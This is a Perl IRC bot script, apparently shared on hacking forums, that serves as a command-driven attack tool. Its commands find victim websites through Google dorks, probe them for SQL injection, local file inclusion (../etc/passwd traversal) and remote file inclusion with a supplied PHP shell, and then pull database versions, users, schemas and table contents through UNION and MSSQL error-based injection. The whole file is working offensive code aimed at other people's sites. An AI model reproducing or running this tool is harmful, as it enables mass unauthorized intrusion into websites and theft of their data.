#!/usr/bin/perl
use IO::Socket::INET ;
use LWP::UserAgent;
use LWP::Simple;
use URI::Escape;
use Digest::MD5 qw(md5_hex);
use Digest::MD5;
use MIME::Base64;
my $server = $ARGV[0];
my $port = $ARGV[1];
my $nick = $ARGV[2];
my $channel = $ARGV[3];
system('cls');
print ' ___ _ ___ _ ';
print "\n";
print '/ __| __ __ _| |___ __| _ ) ___| |_ ';
print "\n";
print '\__ \/ _/ _` | / -_)_ / _ \/ _ \ _|';
print "\n";
print '|___/\__\__,_|_\___/__|___/\___/\__|';
print "\n";
print ' Version 2.0 Coded by Psyk';
print "\n\n";
sub generate_random_string
{
my $length_of_randomstring=shift;# the length of
# the random string to generate
my @chars=('a'..'z','A'..'Z','0'..'9','_');
my $random_string;
foreach (1..$length_of_randomstring)
{
# rand @chars will generate a random
# number between 0 and scalar @chars
$random_string.=$chars[rand @chars];
}
return $random_string;
}
my $random_string=&generate_random_string(5);
#= CONFIGURATION ==========================#
my $server = "irc.malvager.com"; #
my $chan2 = "#hackforums";
my $nick = "broadcast"; #
my $port = "6667"; #
my $channel = "#hackforums";
#
#= END OF CONFIGURATION ===================#
my $name = "$random_string $random_string sb unr";
print "\n";
print "\n [+] Connecting to $server\n";
$connection = IO::Socket::INET->new(PeerAddr=>"$server",
PeerPort=>"$port",
Proto=>'tcp',
Timeout=>'30') or die " [-] Couldnt connect to $server\n";
print " [+] Connected to $server\n\n";
my $testinglol = 0;
print $connection "USER $name\n";
print $connection "NICK $nick\r\n";
while($response = <$connection>)
{
print $response;
#print IRC Response
if($response =~ m/:(.*) 433(.*) (.*) :/){print $connection "NICK $nick\r\n";}
if($response =~ m/:(.*) 432(.*) (.*) :/){system("perl rehash.pl"); &killbot;}
if($response =~ m/:(.*) 00(.*) (.*) :/){print $connection "JOIN ".$channel."\r\n";}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!help/){&help;}
if($response =~ m/:(psyk)!(.*) PRIVMSG $channel :!rj (.*)/){&rejoin;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!sqlscan (.*)$/){&sqlscan;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!lfiscan (.*)$/){&lfiscan;}
if($response =~ m/:(psyk)!(.*) PRIVMSG $chan2 :!rehash/){&rehashbot;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!rfiscan (.*)$/){&rfiscan;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!col (.*)$/){&colcount;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!det (.*)$/){&mysqldet;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!schema (.*)$/){&schema;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!dump (.*)-(.*)-(.*)$/){&mysqldumper;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!ms (.*)$/){&mssqldet;}
if($response =~ m/:(psyk)!(.*) PRIVMSG $channel :!j (.*)$/){&joinchan;}
# if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!list/){&cincludes;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!rehash/){&rehashbot;}
if($response =~ m/:(.*)!(.*) PRIVMSG broadcast : VERSION $/){&ctcpver;}
if($response =~ m/:(.*)!(.*) PRIVMSG $channel :!info/) {&info;}
if($response =~ m/:(psyk)!(.*) PRIVMSG $channel :!die/) {&killbot;}
if($response =~ m/:(psyk)!(.*) PRIVMSG $channel :!stop/) {&stopscan;}
if($response =~ m/^PING (.*?)$/gi){print $connection "PONG ".$1."\r\n";}
}
############################################################################################
sub encryptchat
{
my $range = 100;
my $random_number = rand($range);
@chars = ( "A" .. "Z", "a" .. "z", 0 .. 9, qw(! @ $ % ^ & *) );
$password = join("", @chars[ map { rand @chars } ( 1 .. 8 ) ]);
print $connection "PRIVMSG $channel :Encrypted message: $password^$random_number\r\n";
}
sub newnick
{
my $newnick0 = $3;
print $connection "NICK $newnick0\r\n";
}
sub rejoin
{
print $connection "PRIVMSG $channel :Rejoining\r\n";
print $connection "PART :$3\r\n";
print $connection "JOIN :$3\r\n";
}
sub joinchan
{
my $chan2 = $3;
print $connection " JOIN $chan2\r\n";
}
my $owner = 1;
if($owner = 1){
sub rehashbot
{
print $connection "PRIVMSG $channel :Rehashing...\r\n";
system("perl rehash.pl");
&killbot;
}
sub killbot
{
print $connection "QUIT :Oh nooo D:\r\n";
die("\n\nTermination signal received.\n");
}
########this is for my experimental C plugin. Just commented it out until I release it.
#sub cincludes
#{
# print $connection "PRIVMSG $channel : 4,1 ////////////////////////////////////// \r\n";
# print $connection "PRIVMSG $channel : 4,1 // 8,1= Libraries in use================ 4,1// \r\n";
# print $connection "PRIVMSG $channel : 4,1 //#include <stdio.h> // \r\n";
# print $connection "PRIVMSG $channel : 4,1 //#include <unistd.h> // \r\n";
# print $connection "PRIVMSG $channel : 4,1 //#include <string.h> // \r\n";
# print $connection "PRIVMSG $channel : 4,1 //#include <netdb.h> // \r\n";
# print $connection "PRIVMSG $channel : 4,1 ////////////////////////////////////// \r\n";
#}
#
sub stopscan
{
local $SIG{INT} = 'IGNORE';
kill INT => -$$;
print $connection "PRIVMSG $channel : 4,1[-] Vulnerability Scan stopped\r\n";
}
sub help
{
print $connection "PRIVMSG $channel : 4,1 ///////////////////////////////////////////////// \r\n";
print $connection "PRIVMSG $channel : 4,1 // 8,1= SQL Injection ============================= 4,1// \r\n";
print $connection "PRIVMSG $channel : 4,1 //MySQL Column Count : !col target // \r\n";
print $connection "PRIVMSG $channel : 4,1 //MySQL DB Details : !det target // \r\n";
print $connection "PRIVMSG $channel : 4,1 //MySQL Schema Extractor : !schema target // \r\n";
print $connection "PRIVMSG $channel : 4,1 //MySQL Data Dumper : !dump target // \r\n";
print $connection "PRIVMSG $channel : 4,1 //MsSQL Details : !ms target // \r\n";
print $connection "PRIVMSG $channel : 4,1 // 8,1= Vulnerablitys Scanner ===================== 4,1// \r\n";
print $connection "PRIVMSG $channel : 4,1 //SQL Vuln Scanner : !sqlscan dork // \r\n";
print $connection "PRIVMSG $channel : 4,1 //LFI Vuln Scanner : !lfiscan dork // \r\n";
print $connection "PRIVMSG $channel : 4,1 //RFI Vuln Scanner : !rfiscan dork // \r\n";
print $connection "PRIVMSG $channel : 4,1 //Bot Author etc : !info // \r\n";
print $connection "PRIVMSG $channel : 4,1 ///////////////////////////////////////////////// \r\n";
}
sub ctcpver
{
my $asker = $1;
print $connection "PRIVMSG $asker :VERSION ScalezBot Private v1.0\r\n";
}
sub sqlscan
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
my $dork = $3;
print $connection "PRIVMSG $channel : 4$asker 5[+] SQL Vulnerable Scan Started\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[+] Dork: $dork\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[?] Vulns will be shown as theyre generated\r\n";
my $google = "http://www.google.com/search?hl=en&q=$dork&num=100&btnG=Search&start=" ;
#----
my $request = HTTP::Request->new(GET=>"$google"."$i");
my $useragent = LWP::UserAgent->new(agent => 'Firefox 3.0.9');
my $response = $useragent->request($request) ;
my $con = $response->content;
if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
{ print $connection "PRIVMSG $channel : 4$asker 5[!] Banned From Google Search [uri_escape() bypass didnt work]\r\n"; }
else
{
for ($i=0;$i<300;$i=$i+100)
{
my $request = HTTP::Request->new(GET=>"$google"."$i");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
my $response = $useragent->request($request) ;
my $con = $response->content;
my $start='class=r><a href=\"';
my $end= '" class=l>';
while ( $con =~ m/$start(.*?)$end/g )
{
my $fl = $1;
my $link = $fl.'0+order+by+9999999--';
my $ua = LWP::UserAgent->new();
my $req = $ua->get($link);
my $result = $req->content;
if ($result=~ m/You have an error in your SQL syntax/i || $result=~ m/Query failed/i || $result=~ m/SQL query failed/i || $result=~ m/mysql_fetch_/i || $result=~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
{print $connection "PRIVMSG $channel : 4$asker 5[+] MySQLi // 6 $fl\%27\r\n";}
elsif ($result=~ m/ODBC SQL Server Driver/i || $result=~ m/Unclosed quotation mark/i || $result=~ m/Microsoft OLE DB Provider for/i )
{print $connection "PRIVMSG $channel : 4$asker 5[+] MsSQLi // 6 $fl\%27\r\n";}
elsif ($result=~ m/Microsoft JET Database/i || $result=~ m/ODBC Microsoft Access Driver/i )
{print $connection "PRIVMSG $channel : 4$asker 5[+] MS Access Vuln // 6 $fl\%27\r\n";}
}
}
print $connection "PRIVMSG $channel : 4$asker 5[?] SQL Scan Finished\r\n";
}
exit;
}
############################################################################################
sub lfiscan
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
my $dork = $3;
print $connection "PRIVMSG $channel : 4$asker 5[+] LFI Vulnerable Scan Started\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[+] Dork: $dork\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[?] Vulns will be shown as theyre generated\r\n";
my $google = "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=" ;
@LFI = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',);
my $request = HTTP::Request->new(GET=>"$google"."$i");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
my $response = $useragent->request($request) ;
my $con = $response->content;
if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
{ print $connection "PRIVMSG $channel : 4$asker 5[!] Banned From Google Search [uri_escape() bypass did not work]\r\n"; }
else
{
for ($i=0;$i<200;$i=$i+10)
{
my $start='class=r><a href=\"';
my $end= '" class=l>';
while ( $con =~ m/$start(.*?)$end/g )
{
for ($j;$j<=14;$j++)
{
my $fl = $1;
my $link = $fl.$LFI[$j];
my $ua = LWP::UserAgent->new();
my $req = $ua->get($link);
my $result = $req->content;
if ($result=~ m/root:x:/i)
{print $connection "PRIVMSG $channel : 4$asker 5[+] LFI Vuln // 6 $fl\r\n";}
}
}
}
print $connection "PRIVMSG $channel : 4$asker 5[?] LFI Scan Finished\r\n";
}
exit;
}
############################################################################################
sub rfiscan
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
my $phpshell = $4;
my $dork = $3;
print $connection "PRIVMSG $channel : 4$asker 5[+] RFI Vulnerable Scan Started\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[+] Dork: $dork\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[?] Vulns will be shown as theyre generated\r\n";
my $google = "http://www.google.com/webhp?hl=en#q=$dork&hl=en&start=" ;
my $endkey = "&sa=N&fp=2Inaafc1UxE";
#----
my $request = HTTP::Request->new(GET=>"$google"."$i");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla 5.2');
my $response = $useragent->request($request) ;
my $con = $response->content;
if ($con =~ m/restore your access as quickly as possible, so try again soon. In the meantime, if you suspect that your computer or network has been infected/i)
{ print $connection "PRIVMSG $channel : 4$asker 5[!] Banned From Google Search [url_escape() bypass did not work]\r\n"; }
else
{
for ($i=0;$i<200;$i=$i+10)
{
my $start='class=r><a href=\"';
my $end= '" class=l>';
while ( $con =~ m/$start(.*?)$end/g )
{
my $fl = $1;
my $link = $fl.$phpshell.'??';
my $ua = LWP::UserAgent->new();
my $req = $ua->get($link);
my $result = $req->content;
if ($result=~ m/uid=/i)
{print $connection "PRIVMSG $channel : 4$asker 5[+] RFI Vuln // 6 $fl\r\n";}
}
}
print $connection "PRIVMSG $channel : 4$asker 5[?] RFI Scan Finished\r\n";
}
exit;
}
############################################################################################
sub colcount
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
print $connection "PRIVMSG $channel : 4$asker 5[+] Panning host\r\n";
my $site = $3 ;
my $null = "09+and+1=" ;
my $code = "0+union+select+" ;
my $add = "+" ;
my $com = "--" ;
my $injection = $site.$null.$code."0",$com ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request);
my $result = $response->content;
if( $result =~ /You have an error in your SQL syntax/ || $result=~/Query failed/ || $result=~/SQL query failed/ || $result=~ /mysql_fetch_/ || $result=~ /mysql_fetch_array/ || $result =~ /mysql_num_rows/ || $result =~ /The used SELECT statements have a different number of columns/)
{
print $connection "PRIVMSG $channel : 4$asker 5[+] Websites vulnerable\n" ;
print $connection "PRIVMSG $channel : 4$asker 5[+] Working on it\n";
}
else
{
print $connection "PRIVMSG $channel : 4$asker 10[-] Website is not vulnerable\n\n";
}
for ($i = 0 ; $i < 50 ; $i ++)
{
$col.=','.$i;
$specialword.=','."0x617a38387069783030713938";
if ($i == 0)
{
$specialword = '' ;
$col = '' ;
}
$sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
my $ua = LWP::UserAgent->new();
my $res = $ua->get($sql);
$response=$res->content;
if($response =~ /az88pix00q98/)
{
$i ++;
print $connection "PRIVMSG $channel :$asker 5[+] 6 $i 5Columns\n" ;
}
}
exit;
}
############################################################################################
sub mysqldet
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
my $site = $3 ;
my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938,\@\@datadir,0x617a38387069783030713938)";
print $connection "PRIVMSG $channel : 4$asker 5[+] Mining information\r\n";
if ($site =~ /(.*)NullArea(.*)/i)
{
$newlink = $1.$selection.$2.'--';
my $ua = LWP::UserAgent->new();
my $request = $ua->get($newlink);
my $content = $request->content;
if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
{
print $connection "PRIVMSG $channel : 4$asker 5[+] Database Version // 6 $1\r\n";
print $connection "PRIVMSG $channel :$asker 5[+] Database Name // 6 $2\r\n";
print $connection "PRIVMSG $channel :$asker 5[+] DB UserName // 6 $3\r\n";
print $connection "PRIVMSG $channel :$asker 5[+] Databse Dir // 6 $4\r\n";
}
else
{
print $connection "PRIVMSG $channel : 4$asker 5[-] Failed\r\n";
}
}
else
{
print $connection "PRIVMSG $channel :$asker 5[?] Usage: 6 http://target.net/page.php?id=0+union+select+1,2,stuff,3\r\n";
}
}
sub info
{
use Digest::MD5 qw(md5 md5_hex md5_base64);
$data = "Neconide";
$digest = md5($data);
$digest2 = md5_hex($data);
$digest3 = md5_base64($data);
if($digest = "`F����mRuX��cX0X" && $digest2 eq "604699ac99c96d527558d8ca63583058" && $digest3 eq "YEaZrJnJbVJ1WNjKY1gwWA") {
print $connection "PRIVMSG $channel : 4,1 //////////////////////////////////////////////// \r\n";
print $connection "PRIVMSG $channel : 4,1 // 8,1= Info ===================================== 4,1// \r\n";
print $connection "PRIVMSG $channel : 4,1 //Coded by: Psyk // \r\n";
print $connection "PRIVMSG $channel : 4,1 // With help from: k0pp \& Tull // \r\n";
print $connection "PRIVMSG $channel : 4,1 //////////////////////////////////////////////// \r\n";
}
}
############################################################################################
sub schema
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
my $site = $3 ;
my $selection = "concat(0x617a38387069783030713938,table_name,0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
if ($site =~ /(.*)NullArea(.*)/i)
{
print $connection "PRIVMSG $channel : 4$asker 5[+] 6Table 5:|: 6Column 5:|: 6Database\r\n";
for ($i ; $i<=1500 ; $i++ )
{
$newstring = $1.$selection.$2.'+'.'from'.'+'.'information_schema.columns'.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
my $ua = LWP::UserAgent->new();
my $request = $ua->get($newstring);
my $content = $request->content;
if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
{
print $connection "PRIVMSG $channel : 5[!] 6$1 5:|: 6$2 5:|: 6$3 \r\n";
}
}
}
else
{
print $connection "PRIVMSG $channel :$asker 5[?] Usage: 6 http://target.net/page.php?id=0+union+select+1,2,stuff,3\r\n";
}
exit;
}
############################################################################################
sub mysqldumper
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
my $site = $3 ;
my $table = $5 ;
my $selection = "concat(0x617a38387069783030713938,$4,0x617a38387069783030713938)";
if ($site =~ /(.*)NullArea(.*)/i)
{
print $connection "PRIVMSG $channel : 5[+] 6 DATA\r\n";
for ($i ; $i<=1500 ; $i++ )
{
$newstring = $1.$selection.$2.'+'.'from'.'+'.$table.'+'.'LIMIT'.'+'.$i.','.'1'.'--';
my $ua = LWP::UserAgent->new();
my $request = $ua->get($newstring);
my $content = $request->content;
if ($content =~ /az88pix00q98(.*)az88pix00q98/)
{
print $connection "PRIVMSG $channel :[?] 6 $1\r\n";
}
}
}
else
{
print $connection "PRIVMSG $channel :$asker 5[?] Usage: 6 http://target.net/page.php?id=0+union+select+1,2,stuff,3-column_name-table_name\r\n";
}
exit;
}
############################################################################################
sub mssqldet
{
$pid = fork;
if($pid > 0)
{
return;
}
my $asker = $1;
print $connection "PRIVMSG $channel : 4$asker 5[+] Panning host\r\n";
my $target = $3 ;
print "\n[+] Working On $target" ;
my $version = 'convert(int,(select+@@version));--' ;
my $system_user = 'convert(int,(select+system_user));--';
my $db_name = 'convert(int,(select+db_name()));--';
my $servername = 'convert(int,(select+@@servername));--' ;
my $hostname = 'convert(int,(select+Host_Name()));--';
my $site = $target ;
my $injection = $site.$version ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
my $response = $useragent->request($request)->as_string ;
if ($response =~ /.*?value\s'/)
{
print $connection "PRIVMSG $channel : 4$asker 5[+] Host is vulnerable\r\n";
print $connection "PRIVMSG $channel : 4$asker 5[+] Working on it\r\n";
$ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
print $connection "PRIVMSG $channel : 4$asker 5[!] MsSQL Version // 6$ver\r\n";
my $injection = $site.$system_user ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
$system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print $connection "PRIVMSG $channel : 4$asker 5[!] MsSQL system_user // 6$system_user\r\n";
my $injection = $site.$db_name ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
$db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print $connection "PRIVMSG $channel : 4$asker 5[!] MsSQL database_name // 6$db_name\r\n";
my $injection = $site.$servername ;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
$servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print $connection "PRIVMSG $channel : 4$asker 5[!] MsSQL Server Name // 6$servername\r\n";
my $injection = $site.$hostname;
my $request = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response = $useragent->request($request)->as_string ;
$hostnames = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
print $connection "PRIVMSG $channel : 4$asker 5[!] MsSQL HostName // 6$hostnames\r\n";
}
else
{
print $connection "PRIVMSG $channel : 4$asker 10[-] Host not vulnerable [MsSQL]\r\n";
}
exit;
}
}
############################################################################################
